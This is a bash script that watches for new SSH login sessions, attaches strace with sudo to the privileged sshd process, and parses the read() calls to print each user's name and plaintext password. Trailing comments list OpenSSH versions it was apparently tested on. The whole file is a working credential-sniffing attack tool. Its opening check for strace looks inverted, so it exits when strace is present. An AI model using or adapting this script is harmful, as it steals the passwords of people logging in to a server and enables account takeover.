#!/bin/bash

if [[ ! "$(strace 2>&1 | grep "command not found")" ]];
 then
   echo "You need strace to run this shell script.";
   exit 1;
fi

CurrentUserIDs=($(ps aux | egrep -w '\[priv\]' | awk '{print $2}'| tr '\n' '|' | sed 's/|$//g'));

NumOfUsers="$(ps aux | egrep -w '\[priv\]' | wc -l)";

while :;
 do
   NewUsers="$(ps aux | egrep -w '\[priv\]' | wc -l)";
    if [[ "${NewUsers}" -gt "${NumOfUsers}" ]];
      then pass=$(sudo strace -p $(ps aux | egrep -w '\[priv\]' | egrep -v "${CurrentUserIDs[@]}" | awk '{print $2}') 2>&1 | egrep '18\)  = 18|19\) = 19');
       if [[ "${pass}" ]];
        then 
          echo `date`;
          echo "Username: `who | tail -n1 | awk '{print $1}'`";
          pass2=$(echo ${pass} | sed 's/read(6, "//g ; s/\\v\\0\\0\\0\\//g ; s/",//g ; s/"\.\.\.,//g ; s/ 18)  = 18//g ; s/ 19) = 19//g' | sed 's/^16//g' | sed 's/^r//g');
          pass3=$(echo ${pass2} | sed 's/^16//g' | sed 's/^r//g' | sed 's/18) = 18 read(5, //g ; s/"=\\0\\0\\0\\n\/dev\/pts\/1\\0\\0\\0\\0//g');
          echo "Password: ${pass3}"
          echo -e "\n";
          NumOfUsers="$(ps aux | egrep -w '\[priv\]' | wc -l)";
          CurrentUserIDs=($(ps aux | egrep -w '\[priv\]' | awk '{print $2}'| tr '\n' '|' | sed 's/|$//g'));
            else true;
          NumOfUsers="$(ps aux | egrep -w '\[priv\]' | wc -l)";
          CurrentUserIDs=($(ps aux | egrep -w '\[priv\]' | awk '{print $2}'| tr '\n' '|' | sed 's/|$//g'));
       fi
    fi
done

#Tested on SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1.2
#Tested on SSH-2.0-OpenSSH_5.1p1 Debian-5ubuntu1
#Tested on OpenSSH 5.2 (protocol 2.0) Fedora 11